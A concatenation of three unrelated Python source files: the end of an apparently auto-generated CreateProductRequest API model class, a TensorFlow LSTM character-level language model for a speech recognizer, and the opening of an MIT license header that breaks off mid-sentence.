Gets the active of this CreateProductRequest.
:return: The active of this CreateProductRequest.
:rtype: bool
"""
return self._active
@active.setter
def active(self, active):
"""
Sets the active of this CreateProductRequest.
:param active: The active of this CreateProductRequest.
:type: bool
"""
self._active = active
@property
def reference(self):
"""
Gets the reference of this CreateProductRequest.
:return: The reference of this CreateProductRequest.
:rtype: str
"""
return self._reference
@reference.setter
def reference(self, reference):
"""
Sets the reference of this CreateProductRequest.
:param reference: The reference of this CreateProductRequest.
:type: str
"""
self._reference = reference
@property
def date_from(self):
"""
Gets the date_from of this CreateProductRequest.
:return: The date_from of this CreateProductRequest.
:rtype: str
"""
return self._date_from
@date_from.setter
def date_from(self, date_from):
"""
Sets the date_from of this CreateProductRequest.
:param date_from: The date_from of this CreateProductRequest.
:type: str
"""
self._date_from = date_from
@property
def date_to(self):
"""
Gets the date_to of this CreateProductRequest.
:return: The date_to of this CreateProductRequest.
:rtype: str
"""
return self._date_to
@date_to.setter
def date_to(self, date_to):
"""
Sets the date_to of this CreateProductRequest.
:param date_to: The date_to of this CreateProductRequest.
:type: str
"""
self._date_to = date_to
@property
def availability_before(self):
"""
Gets the availability_before of this CreateProductRequest.
Value can be 0, 1 or 2
:return: The availability_before of this CreateProductRequest.
:rtype: int
"""
return self._availability_before
@availability_before.setter
def availability_before(self, availability_before):
"""
Sets the availability_before of this CreateProductRequest.
Value can be 0, 1 or 2
:param availability_before: The availability_before of this CreateProductRequest.
:type: int
"""
self._availability_before = availability_before
@property
def availability_after(self):
"""
Gets the availability_after of this CreateProductRequest.
Value can be 0, 1 or 2
:return: The availability_after of this CreateProductRequest.
:rtype: int
"""
return self._availability_after
@availability_after.setter
def availability_after(self, availability_after):
"""
Sets the availability_after of this CreateProductRequest.
Value can be 0, 1 or 2
:param availability_after: The availability_after of this CreateProductRequest.
:type: int
"""
self._availability_after = availability_after
@property
def id_category_default(self):
"""
Gets the id_category_default of this CreateProductRequest.
:return: The id_category_default of this CreateProductRequest.
:rtype: int
"""
return self._id_category_default
@id_category_default.setter
def id_category_default(self, id_category_default):
"""
Sets the id_category_default of this CreateProductRequest.
:param id_category_default: The id_category_default of this CreateProductRequest.
:type: int
"""
if id_category_default is None:
raise ValueError("Invalid value for `id_category_default`, must not be `None`")
self._id_category_default = id_category_default
@property
def tags(self):
"""
Gets the tags of this CreateProductRequest.
:return: The tags of this CreateProductRequest.
:rtype: list[I18nField]
"""
return self._tags
@tags.setter
def tags(self, tags):
"""
Sets the tags of this CreateProductRequest.
:param tags: The tags of this CreateProductRequest.
:type: list[I18nField]
"""
self._tags = tags
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
|
# coding=utf-8
# TODO: Not yet implemented!
"""
The model for the character level speech recognizer.
Based on the paper:
http://arxiv.org/pdf/1601.06581v2.pdf
This model is:
character level RNN-LM
"""
import tensorflow as tf
from tensorflow.python.client import timeline
import numpy as np
import time
import os
from datetime import datetime
import logging
from random import randint
import util.dataprocessor as dataprocessor
class LanguageModel(object):
def __init__(self, num_layers, hidden_size, batch_size, max_input_seq_length,
max_target_seq_length, input_dim):
"""
Character level language model to help with language model predictions
Uses lstm cells in a deep rnn
Parameters
----------
:param num_layers: number of lstm layers
:param hidden_size: size of hidden layers
:param batch_size: number of training examples fed at once
:param max_input_seq_length: maximum length of input vector sequence
:param max_target_seq_length: maximum length of ouput vector sequence
:param input_dim: dimension of input vector
"""
# Store model's parameters
self.num_layers = num_layers
self.hidden_size = hidden_size
self.batch_size = batch_size
self.max_input_seq_length = max_input_seq_length
self.max_target_seq_length = max_target_seq_length
self.input_dim = input_dim
# Output vector as the same dimension as input
self.num_labels = input_dim
# Create object's variables for tensorflow ops
self.rnn_state_zero_op = None
self.rnn_keep_state_op = None
self.saver_op = None
# Create object's variable for result output
self.prediction = None
# Create object's variables for placeholders
self.input_keep_prob_ph = self.output_keep_prob_ph = None
self.inputs_ph = self.input_seq_lengths_ph = self.labels_ph = None
# Create object's variables for dataset's iterator input
self.iterator_get_next_op = None
self.is_training_var = tf.Variable(initial_value=False, trainable=False, name="is_training_var", dtype=tf.bool)
# Create object's variable for hidden state
self.rnn_tuple_state = None
# Create object's variables for training
self.input_keep_prob = self.output_keep_prob = None
self.global_step = None
self.learning_rate_var = None
# Create object variables for tensorflow training's ops
self.learning_rate_decay_op = None
self.accumulated_mean_loss = self.acc_mean_loss_op = self.acc_mean_loss_zero_op = None
self.accumulated_error_rate = self.acc_error_rate_op = self.acc_error_rate_zero_op = None
self.mini_batch = self.increase_mini_batch_op = self.mini_batch_zero_op = None
self.acc_gradients_zero_op = self.accumulate_gradients_op = None
self.train_step_op = None
# Create object's variables for tensorboard
self.tensorboard_dir = None
self.timeline_enabled = False
self.train_summaries_op = None
self.test_summaries_op = None
self.summary_writer_op = None
# Create object's variables for status checking
self.rnn_created = False
def create_forward_rnn(self):
"""
Create the forward-only RNN
Parameters
-------
:return: the logits
"""
if self.rnn_created:
logging.fatal("Trying to create the language RNN but it is already.")
# Set placeholders for input
self.inputs_ph = tf.placeholder(tf.float32, shape=[self.max_input_seq_length, None, self.input_dim],
name="inputs_ph")
self.input_seq_lengths_ph = tf.placeholder(tf.int32, shape=[None], name="input_seq_lengths_ph")
# Build the RNN
self.global_step, logits, self.prediction, self.rnn_keep_state_op, self.rnn_state_zero_op, \
_, _, self.rnn_tuple_state = self._build_base_rnn(self.inputs_ph, self.input_seq_lengths_ph, True)
# Add the saving and restore operation
self.saver_op = self._add_saving_op()
return logits
def create_training_rnn(self, input_keep_prob, output_keep_prob, grad_clip, learning_rate, lr_decay_factor,
use_iterator=False):
"""
Create the training RNN
Parameters
----------
:param input_keep_prob: probability of keeping input signal for a cell during training
:param output_keep_prob: probability of keeping output signal from a cell during training
:param grad_clip: max gradient size (prevent exploding gradients)
:param learning_rate: learning rate parameter fed to optimizer
:param lr_decay_factor: decay factor of the learning rate
:param use_iterator: if True then plug an iterator.get_next() operation for the input of the model, if None
placeholders are created instead
"""
if self.rnn_created:
logging.fatal("Trying to create the language RNN but it is already.")
# Store model parameters
self.input_keep_prob = input_keep_prob
self.output_keep_prob = output_keep_prob
if use_iterator is True:
text_batch, input_lengths, label_batch = self.iterator_get_next_op
# Pad if the batch is not complete
padded_text_batch = tf.pad(text_batch, [[0, self.batch_size - tf.size(input_lengths)], [0, 0], [0, 0]])
# Transpose padded_text_batch in order to get time serie as first dimension
# [batch_size, time_serie, input_dim] ====> [time_serie, batch_size, input_dim]
inputs = tf.transpose(padded_text_batch, perm=[1, 0, 2])
# Pad input_seq_lengths if the batch is not complete
input_seq_lengths = tf.pad(input_lengths, [[0, self.batch_size - tf.size(input_lengths)]])
# Label tensor must be provided as a sparse tensor.
sparse_labels = tf.SparseTensor(label_batch[0], label_batch[1], [self.batch_size, label_batch[2][1]])
# Pad sparse_labels if the batch is not complete
sparse_labels, _ = tf.sparse_fill_empty_rows(sparse_labels, self.num_labels - 1)
else:
# Set placeholders for input
self.inputs_ph = tf.placeholder(tf.int32, shape=[self.max_input_seq_length, None, self.input_dim],
name="inputs_ph")
self.input_seq_lengths_ph = tf.placeholder(tf.int32, shape=[None], name="input_seq_lengths_ph")
self.labels_ph = tf.placeholder(tf.int32, shape=[None, self.max_target_seq_length],
name="labels_ph")
inputs = self.inputs_ph
input_seq_lengths = self.input_seq_lengths_ph
label_batch = self.labels_ph
# Label tensor must be provided as a sparse tensor.
# First get indexes from non-zero positions
idx = tf.where(tf.not_equal(label_batch, 0))
# Then build a sparse tensor from indexes
sparse_labels = tf.SparseTensor(idx, tf.gather_nd(label_batch, idx),
[self.batch_size, self.max_target_seq_length])
self.global_step, logits, prediction, self.rnn_keep_state_op, self.rnn_state_zero_op, self.input_keep_prob_ph, \
self.output_keep_prob_ph, self.rnn_tuple_state = self._build_base_rnn(inputs, input_seq_lengths, False)
# Add the train part to the network
self.learning_rate_var = self._add_training_on_rnn(logits, grad_clip, learning_rate, lr_decay_factor,
sparse_labels, input_seq_lengths, prediction)
# Add the saving and restore operation
self.saver_op = self._add_saving_op()
def _build_base_rnn(self, inputs, input_seq_lengths, forward_only=True):
"""
Build the Language RNN
Parameters
----------
:param inputs: inputs to the RNN
:param input_seq_lengths: vector containing the length of each input from 'inputs'
:param forward_only: whether the RNN will be used for training or not (if true then add a dropout layer)
Returns
----------
:returns logits: each char probability for each timestep of the input, for each item of the batch
:returns prediction: the best prediction for the input
:returns rnn_keep_state_op: a tensorflow op to save the RNN internal state for the next batch
:returns rnn_state_zero_op: a tensorflow op to reset the RNN internal state to zeros
:returns input_keep_prob_ph: a placeholder for input_keep_prob of the dropout layer
(None if forward_only is True)
:returns output_keep_prob_ph: a placeholder for output_keep_prob of the dropout layer
(None if forward_only is True)
:returns rnn_tuple_state: the RNN internal state
"""
# Define a variable to keep track of the learning process step
global_step = tf.Variable(0, trainable=False, name='global_step')
# If building the RNN for training then create dropout rate placeholders
input_keep_prob_ph = output_keep_prob_ph = None
if not forward_only:
with tf.name_scope('dropout'):
# Create placeholders, used to override values when running on the test set
input_keep_prob_ph = tf.placeholder(tf.float32)
output_keep_prob_ph = tf.placeholder(tf.float32)
# Define cells of language model
with tf.variable_scope('LSTM'):
# Create each layer
layers_list = []
for _ in range(self.num_layers):
cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, state_is_tuple=True)
# If building the RNN for training then add a dropoutWrapper to the cells
if not forward_only:
with tf.name_scope('dropout'):
cell = tf.contrib.rnn.DropoutWrapper(cell, input_keep_prob=input_keep_prob_ph,
output_keep_prob=output_keep_prob_ph)
layers_list.append(cell)
# Store the layers in a multi-layer RNN
cell = tf.contrib.rnn.MultiRNNCell(layers_list, state_is_tuple=True)
# Build the input layer between input and the RNN
with tf.variable_scope('Input_Layer'):
w_i = tf.get_variable("input_w", [self.input_dim, self.hidden_size], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
b_i = tf.get_variable("input_b", [self.hidden_size], tf.float32,
initializer=tf.constant_initializer(0.0))
# Apply the input layer to the network input to produce the input for the rnn part of the network
rnn_inputs = [tf.matmul(tf.squeeze(tf.cast(i, tf.float32), axis=[0]), w_i) + b_i
for i in tf.split(axis=0, num_or_size_splits=self.max_input_seq_length, value=inputs)]
# Switch from a list to a tensor
rnn_inputs = tf.stack(rnn_inputs)
# Define some variables to store the RNN state
# Note : tensorflow keep the state inside a batch but it's necessary to do this in order to keep the state
# between batches, especially when doing live transcript
# Another way would have been to get the state as an output of the session and feed it every time but
# this way is much more efficient
with tf.variable_scope('Hidden_state'):
state_variables = []
for state_c, state_h in cell.zero_state(self.batch_size, tf.float32):
state_variables.append(tf.nn.rnn_cell.LSTMStateTuple(
tf.Variable(state_c, trainable=False),
tf.Variable(state_h, trainable=False)))
# Return as a tuple, so that it can be fed to dynamic_rnn as an initial state
rnn_tuple_state = tuple(state_variables)
# Build the RNN
with tf.name_scope('LSTM'):
rnn_output, new_states = tf.nn.dynamic_rnn(cell, rnn_inputs, sequence_length=input_seq_lengths,
initial_state=rnn_tuple_state, time_major=True)
# Define an op to keep the hidden state between batches
update_ops = []
for state_variable, new_state in zip(rnn_tuple_state, new_states):
# Assign the new state to the state variables on this layer
update_ops.extend([state_variable[0].assign(new_state[0]),
state_variable[1].assign(new_state[1])])
# Return a tuple in order to combine all update_ops into a single operation.
# The tuple's actual value should not be used.
rnn_keep_state_op = tf.tuple(update_ops)
# Define an op to reset the hidden state to zeros
update_ops = []
for state_variable in rnn_tuple_state:
# Assign the new state to the state variables on this layer
update_ops.extend([state_variable[0].assign(tf.zeros_like(state_variable[0])),
state_variable[1].assign(tf.zeros_like(state_variable[1]))])
# Return a tuple in order to combine all update_ops into a single operation.
# The tuple's actual value should not be used.
rnn_state_zero_op = tf.tuple(update_ops)
# Build the output layer between the RNN and the char_map
with tf.variable_scope('Output_layer'):
w_o = tf.get_variable("output_w", [self.hidden_size, self.num_labels], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
b_o = tf.get_variable("output_b", [self.num_labels], tf.float32,
initializer=tf.constant_initializer(0.0))
# Compute the logits (each char probability for each timestep of the input, for each item of the batch)
logits = tf.stack([tf.matmul(tf.squeeze(i, axis=[0]), w_o) + b_o
for i in tf.split(axis=0, num_or_size_splits=self.max_input_seq_length, value=rnn_output)])
# Compute the prediction which is the best "path" of probabilities for each item of the batch
decoded, _log_prob = tf.nn.ctc_beam_search_decoder(logits, input_seq_lengths)
# Set the RNN result to the best path found
prediction = tf.to_int32(decoded[0])
return global_step, logits, prediction, rnn_keep_state_op, rnn_state_zero_op, \
input_keep_prob_ph, output_keep_prob_ph, rnn_tuple_state
def _add_training_on_rnn(self, logits, grad_clip, learning_rate, lr_decay_factor,
sparse_labels, input_seq_lengths, prediction):
"""
Build the training add-on of the Language RNN
This add-on offer ops that can be used to train the network :
* self.learning_rate_decay_op : will decay the learning rate
* self.acc_mean_loss_op : will compute the loss and accumulate it over multiple mini-batchs
* self.acc_mean_loss_zero_op : will reset the loss accumulator to 0
* self.acc_error_rate_op : will compute the error rate and accumulate it over multiple mini-batchs
* self.acc_error_rate_zero_op : will reset the error_rate accumulator to 0
* self.increase_mini_batch_op : will increase the mini-batchs counter
* self.mini_batch_zero_op : will reset the mini-batchs counter
* self.acc_gradients_zero_op : will reset the gradients
* self.accumulate_gradients_op : will compute the gradients and accumulate them over multiple mini-batchs
* self.train_step_op : will clip the accumulated gradients and apply them on the RNN
Parameters
----------
:param logits: the output of the RNN before the beam search
:param grad_clip: max gradient size (prevent exploding gradients)
:param learning_rate: learning rate parameter fed to optimizer
:param lr_decay_factor: decay factor of the learning rate
:param sparse_labels: the labels in a sparse tensor
:param input_seq_lengths: vector containing the length of each input from 'inputs'
:param prediction: the predicted label given by the RNN
Returns
-------
:returns: tensorflow variable keeping the current learning rate
"""
# Define the variable for the learning rate
learning_rate_var = tf.Variable(float(learning_rate), trainable=False, name='learning_rate')
# Define an op to decrease the learning rate
self.learning_rate_decay_op = learning_rate_var.assign(tf.multiply(learning_rate_var, lr_decay_factor))
# Compute the CTC loss between the logits and the truth for each item of the batch
with tf.name_scope('CTC'):
ctc_loss = tf.nn.ctc_loss(sparse_labels, logits, input_seq_lengths, ignore_longer_outputs_than_inputs=True)
# Compute the mean loss of the batch (only used to check on progression in learning)
# The loss is averaged accross the batch but before we take into account the real size of the label
mean_loss = tf.reduce_mean(tf.truediv(ctc_loss, tf.to_float(input_seq_lengths)))
# Set an accumulator to sum the loss between mini-batchs
self.accumulated_mean_loss = tf.Variable(0.0, trainable=False)
self.acc_mean_loss_op = self.accumulated_mean_loss.assign_add(mean_loss)
self.acc_mean_loss_zero_op = self.accumulated_mean_loss.assign(tf.zeros_like(self.accumulated_mean_loss))
# Compute the error between the logits and the truth
with tf.name_scope('Error_Rate'):
error_rate = tf.reduce_mean(tf.edit_distance(prediction, sparse_labels, normalize=True))
# Set an accumulator to sum the error rate between mini-batchs
self.accumulated_error_rate = tf.Variable(0.0, trainable=False)
self.acc_error_rate_op = self.accumulated_error_rate.assign_add(error_rate)
self.acc_error_rate_zero_op = self.accumulated_error_rate.assign(tf.zeros_like(self.accumulated_error_rate))
# Count mini-batchs
with tf.name_scope('Mini_batch'):
# Set an accumulator to count the number of mini-batchs in a batch
# Note : variable is defined as float to avoid type conversion error using tf.divide
self.mini_batch = tf.Variable(0.0, trainable=False)
self.increase_mini_batch_op = self.mini_batch.assign_add(1)
self.mini_batch_zero_op = self.mini_batch.assign(tf.zeros_like(self.mini_batch))
# Compute the gradients
trainable_variables = tf.trainable_variables()
with tf.name_scope('Gradients'):
opt = tf.train.AdamOptimizer(learning_rate_var)
gradients = opt.compute_gradients(ctc_loss, trainable_variables)
# Define a list of variables to store the accumulated gradients between batchs
accumulated_gradients = [tf.Variable(tf.zeros_like(tv.initialized_value()), trainable=False)
for tv in trainable_variables]
# Define an op to reset the accumulated gradient
self.acc_gradients_zero_op = [tv.assign(tf.zeros_like(tv)) for tv in accumulated_gradients]
# Define an op to accumulate the gradients calculated by the current batch with
# the accumulated gradients variable
self.accumulate_gradients_op = [accumulated_gradients[i].assign_add(gv[0])
for i, gv in enumerate(gradients)]
# Define an op to apply the result of the accumulated gradients
clipped_gradients, _norm = tf.clip_by_global_norm(accumulated_gradients, grad_clip)
self.train_step_op = opt.apply_gradients([(clipped_gradients[i], gv[1]) for i, gv in enumerate(gradients)],
global_step=self.global_step)
return learning_rate_var
def add_tensorboard(self, session, tensorboard_dir, tb_run_name=None, timeline_enabled=False):
"""
Add the tensorboard operations to the RNN
This method will add ops to feed tensorboard
self.train_summaries_op : will produce the summary for a training step
self.test_summaries_op : will produce the summary for a test step
self.summary_writer_op : will write the summary to disk
Parameters
----------
:param session: the tensorflow session
:param tensorboard_dir: path to tensorboard directory
:param tb_run_name: directory name for the tensorboard files inside tensorboard_dir, if None a default dir
will be created
:param timeline_enabled: enable the output of a trace file for timeline visualization
"""
self.tensorboard_dir = tensorboard_dir
self.timeline_enabled = timeline_enabled
# Define GraphKeys for TensorBoard
graphkey_training = tf.GraphKeys()
graphkey_test = tf.GraphKeys()
# Learning rate
tf.summary.scalar('Learning_rate', self.learning_rate_var, collections=[graphkey_training, graphkey_test])
# Loss
with tf.name_scope('Mean_loss'):
mean_loss = tf.divide(self.accumulated_mean_loss, self.mini_batch)
tf.summary.scalar('Training', mean_loss, collections=[graphkey_training])
tf.summary.scalar('Test', mean_loss, collections=[graphkey_test])
# Accuracy
with tf.name_scope('Accuracy_-_Error_Rate'):
mean_error_rate = tf.divide(self.accumulated_error_rate, self.mini_batch)
tf.summary.scalar('Training', mean_error_rate, collections=[graphkey_training])
tf.summary.scalar('Test', mean_error_rate, collections=[graphkey_test])
# Hidden state
with tf.name_scope('RNN_internal_state'):
for idx, state_variable in enumerate(self.rnn_tuple_state):
tf.summary.histogram('Training_layer-{0}_cell_state'.format(idx), state_variable[0],
collections=[graphkey_training])
tf.summary.histogram('Test_layer-{0}_cell_state'.format(idx), state_variable[0],
collections=[graphkey_test])
tf.summary.histogram('Training_layer-{0}_hidden_state'.format(idx), state_variable[1],
collections=[graphkey_training])
tf.summary.histogram('Test_layer-{0}_hidden_state'.format(idx), state_variable[1],
collections=[graphkey_test])
self.train_summaries_op = tf.summary.merge_all(key=graphkey_training)
self.test_summaries_op = tf.summary.merge_all(key=graphkey_test)
if tb_run_name is None:
run_name = datetime.now().strftime('%Y-%m-%d--%H-%M-%S')
else:
run_name = tb_run_name
self.summary_writer_op = tf.summary.FileWriter(tensorboard_dir + '/' + run_name + '/', graph=session.graph)
def get_learning_rate(self):
return self.learning_rate_var.eval()
def set_learning_rate(self, sess, learning_rate):
assign_op = self.learning_rate_var.assign(learning_rate)
sess.run(assign_op)
def set_is_training(self, sess, is_training):
assign_op = self.is_training_var.assign(is_training)
sess.run(assign_op)
@staticmethod
def initialize(sess):
# Initialize variables
sess.run(tf.global_variables_initializer())
def save(self, session, checkpoint_dir):
# Save the model
checkpoint_path = os.path.join(checkpoint_dir, "languagemodel.ckpt")
self.saver_op.save(session, checkpoint_path, global_step=self.global_step)
logging.info("Checkpoint saved")
def restore(self, session, checkpoint_dir):
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
# Restore from checkpoint (will overwrite variables)
if ckpt:
self.saver_op.restore(session, ckpt.model_checkpoint_path)
logging.info("Restored model parameters from %s (global_step id %d)", ckpt.model_checkpoint_path,
self.global_step.eval())
else:
logging.info("Created model with fresh parameters.")
return
@staticmethod
def _add_saving_op():
"""
Define a tensorflow operation to save or restore the network
:return: a tensorflow tf.train.Saver operation
"""
# Define an op to save or restore the network
# Only save needed tensors :
# - weight and biais from the input layer, the output layer
# - weight and biais from the LSTM (which are named kernel and bias respectively)
# - currents global_step and learning_rate
for var in tf.global_variables():
logging.debug("TF variable : %s - %s", var.name, var)
save_list = [var for var in tf.global_variables()
if (var.name.find('/input_w:0') != -1) or (var.name.find('/input_b:0') != -1) or
(var.name.find('/output_w:0') != -1) or (var.name.find('/output_b:0') != -1) or
(var.name.find('global_step:0') != -1) or (var.name.find('learning_rate:0') != -1) or
(var.name.find('/kernel:0') != -1) or (var.name.find('/bias:0') != -1)]
if len(save_list) == 0:
raise ValueError("Trying to define the saving operation before the RNN is built")
saver_op = tf.train.Saver(save_list)
return saver_op
def run_step(self, session, compute_gradients=True, run_options=None, run_metadata=None):
"""
Returns:
mean of ctc_loss
"""
# Base output is to accumulate loss, error_rate, increase the mini-batchs counter and keep the hidden state for
# next batch
output_feed = [self.acc_mean_loss_op, self.acc_error_rate_op,
self.increase_mini_batch_op, self.rnn_keep_state_op]
if compute_gradients:
# Add the update operation
output_feed.append(self.accumulate_gradients_op)
# and feed the dropout layer the keep probability values
input_feed = {self.input_keep_prob_ph: self.input_keep_prob,
self.output_keep_prob_ph: self.output_keep_prob}
else:
# No need to apply a dropout, set the keep probability to 1.0
input_feed = {self.input_keep_prob_ph: 1.0, self.output_keep_prob_ph: 1.0}
# Actually run the tensorflow session
start_time = time.time()
logging.debug("Starting a step")
session.run(output_feed, input_feed, options=run_options, run_metadata=run_metadata)
mini_batch_num = self.mini_batch.eval()
logging.debug("Step duration : %.2f", time.time() - start_time)
return mini_batch_num
def start_batch(self, session, is_training, run_options=None, run_metadata=None):
output = [self.acc_error_rate_zero_op, self.acc_mean_loss_zero_op, self.mini_batch_zero_op]
self.set_is_training(session, is_training)
if is_training:
output.append(self.acc_gradients_zero_op)
session.run(output, options=run_options, run_metadata=run_metadata)
return
def end_batch(self, session, is_training, run_options=None, run_metadata=None, rnn_state_reset_ratio=1.0):
# Get each accumulator's value and compute the mean for the batch
output_feed = [self.accumulated_mean_loss, self.accumulated_error_rate, self.mini_batch, self.global_step]
# If in training...
if is_training:
# Append the train_step_op (this will apply the gradients)
output_feed.append(self.train_step_op)
# Reset the hidden state at the given random ratio (default to always)
if randint(1, 1 // rnn_state_reset_ratio) == 1:
output_feed.append(self.rnn_state_zero_op)
# If a tensorboard dir is configured then run the merged_summaries operation
if self.tensorboard_dir is not None:
if is_training:
output_feed.append(self.train_summaries_op)
else:
output_feed.append(self.test_summaries_op)
outputs = session.run(output_feed, options=run_options, run_metadata=run_metadata)
accumulated_loss = outputs[0]
accumulated_error_rate = outputs[1]
batchs_count = outputs[2]
global_step = outputs[3]
if self.tensorboard_dir is not None:
summary = outputs[-1]
self.summary_writer_op.add_summary(summary, global_step)
mean_loss = accumulated_loss / batchs_count
mean_error_rate = accumulated_error_rate / batchs_count
return mean_loss, mean_error_rate, global_step
def process_input(self, session, inputs, input_seq_lengths, run_options=None, run_metadata=None):
"""
Returns:
Next char
"""
input_feed = {self.inputs_ph: np.array(inputs), self.input_seq_lengths_ph: np.array(input_seq_lengths)}
if (self.input_keep_prob_ph is not None) and (self.output_keep_prob_ph is not None):
input_feed[self.input_keep_prob_ph] = 1.0
input_feed[self.output_keep_prob_ph] = 1.0
output_feed = [self.prediction]
outputs = session.run(output_feed, input_feed, options=run_options, run_metadata=run_metadata)
predictions = session.run(tf.sparse_tensor_to_dense(outputs[0], default_value=self.num_labels,
validate_indices=True),
options=run_options, run_metadata=run_metadata)
return predictions
@staticmethod
def build_dataset(input_set, batch_size, max_input_seq_length, char_map):
# TODO : fix size calculation
length_set = [len(label) for label in input_set]
input_dataset = tf.data.Dataset.from_tensor_slices(input_set)
input_length_dataset = tf.data.Dataset.from_tensor_slices(length_set)
label_dataset = tf.data.Dataset.from_tensor_slices(input_set)
def _transcode_label(label):
# Need to convert back to string because tf.py_func changed it to a numpy array
label = str(label, encoding='UTF-8')
label_transcoded = dataprocessor.DataProcessor.get_str_to_one_hot_encoded(char_map, label)
return np.array(label_transcoded, dtype=np.int32)
def _transcode_and_offset_label(label):
# Need to convert back to string because tf.py_func changed it to a numpy array
label = str(label, encoding='UTF-8')
offseted_label = dataprocessor.DataProcessor.get_str_labels(char_map, label)
offseted_label = offseted_label[1:]
offseted_label.append(len(char_map) - 1)
logging.debug("Returning offseted label as : %s", offseted_label)
return np.array(offseted_label, dtype=np.int32)
input_dataset = input_dataset.map(lambda label: tf.py_func(_transcode_label, [label], tf.int32),
num_parallel_calls=2).prefetch(30)
label_dataset = label_dataset.map(lambda label: tf.py_func(_transcode_and_offset_label, [label], tf.int32),
num_parallel_calls=2).prefetch(30)
# Batch the datasets
input_dataset = input_dataset.padded_batch(batch_size, padded_shapes=[None, None])
label_dataset = label_dataset.apply(tf.contrib.data.dense_to_sparse_batch(batch_size=batch_size,
row_shape=[max_input_seq_length]))
input_length_dataset = input_length_dataset.batch(batch_size)
# And zip them together
dataset = tf.data.Dataset.zip((input_dataset, input_length_dataset, label_dataset))
# TODO : add a filter for files which are too long (currently de-structuring with Dataset.filter is not
# supported in python3)
return dataset
def add_dataset_input(self, dataset):
"""
Add one dataset as an input to the model
Parameters
----------
:param dataset: a tensorflow Dataset
:return iterator: tensorflow Iterator for the dataset
"""
iterator = dataset.make_initializable_iterator()
self.iterator_get_next_op = iterator.get_next()
return iterator
def add_datasets_input(self, train_dataset, valid_dataset):
"""
Add training and evaluation datasets for input to the model
Warning : returned iterators must be initialized before use : "tf.Session.run(iterator.initializer)" on each
Parameters
----------
:param train_dataset: a tensorflow Dataset
:param valid_dataset: a tensorflow Dataset
:return t_iterator: tensorflow Iterator for the train dataset
:return v_iterator: tensorflow Iterator for the valid dataset
"""
t_iterator = train_dataset.make_initializable_iterator()
v_iterator = valid_dataset.make_initializable_iterator()
self.iterator_get_next_op = tf.cond(self.is_training_var, lambda: t_iterator.get_next(),
lambda: v_iterator.get_next())
return t_iterator, v_iterator
def _write_timeline(self, run_metadata, inter_time, action=""):
logging.debug("--- Action %s duration : %.4f", action, time.time() - inter_time)
if self.tensorboard_dir is None:
logging.warning("Could not write timeline, a tensorboard_dir is required in config file")
return
# Create the Timeline object, and write it to a json
trace = timeline.Timeline(step_stats=run_metadata.step_stats)
logging.info('Writing to timeline-' + action + '.ctf.json')
with open(self.tensorboard_dir + '/' + 'timeline-' + action + '.ctf.json', 'w') as trace_file:
trace_file.write(trace.generate_chrome_trace_format())
return time.time()
def run_train_step(self, sess, mini_batch_size, rnn_state_reset_ratio, run_options=None, run_metadata=None):
"""
Run a single train step
Parameters
----------
:param sess: a tensorflow session
:param mini_batch_size: the number of batchs to run before applying the gradients
:param rnn_state_reset_ratio: the ratio to which the RNN internal state will be reset to 0
example: 1.0 mean the RNN internal state will be reset at the end of each batch
example: 0.25 mean there is 25% chances that the RNN internal state will be reset at the end of each batch
:param run_options: options parameter for the sess.run calls
:param run_metadata: run_metadata parameter for the sess.run calls
:returns float mean_loss: mean loss for the train batch run
:returns float mean_error_rate: mean error rate for the train batch run
:returns int current_step: new value of the step counter at the end of this batch
:returns bool dataset_empty: `True` if the dataset was emptied during the batch
"""
start_time = inter_time = time.time()
dataset_empty = False
# Start a new batch
self.start_batch(sess, True, run_options=run_options, run_metadata=run_metadata)
if self.timeline_enabled:
inter_time = self._write_timeline(run_metadata, inter_time, "start_batch")
# Run multiple mini-batchs inside the train step
mini_batch_num = 0
try:
for i in range(mini_batch_size):
# Run a step on a batch and keep the loss
mini_batch_num = self.run_step(sess, True, run_options=run_options, run_metadata=run_metadata)
if self.timeline_enabled:
inter_time = self._write_timeline(run_metadata, inter_time, "step-" + str(i))
except tf.errors.OutOfRangeError:
logging.debug("Dataset empty, exiting train step")
dataset_empty = True
# Close the batch if at least a mini-batch was completed
if mini_batch_num > 0:
mean_loss, mean_error_rate, current_step = self.end_batch(sess, True, run_options=run_options,
run_metadata=run_metadata,
rnn_state_reset_ratio=rnn_state_reset_ratio)
if self.timeline_enabled:
_ = self._write_timeline(run_metadata, inter_time, "end_batch")
# Step result
logging.info("Batch %d : loss %.5f - error_rate %.5f - duration %.2f",
current_step, mean_loss, mean_error_rate, time.time() - start_time)
return mean_loss, mean_error_rate, current_step, dataset_empty
else:
return 0.0, 0.0, self.global_step.eval(), dataset_empty
|
|
# Copyright (c) 2013 Paul Tagliamonte <paultag@debian.org>
# Copyright (c) 2013 Gergely Nagy <algernon@madhouse-project.org>
# Copyright (c) 2013 James King <james@agentultra.com>
# Copyright (c) 2013 Julien Danjou <julien@danjou.info>
# Copyright (c) 2013 Konrad Hinsen <konrad.hinsen@fastmail.net>
# Copyright (c) 2013 Thom Neale <twneale@gmail.com>
# Copyright (c) 2013 Will Kahn-Greene <willg@bluesock.org>
# Copyright (c) 2013 Bob Tolbert <bob@tolbert.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
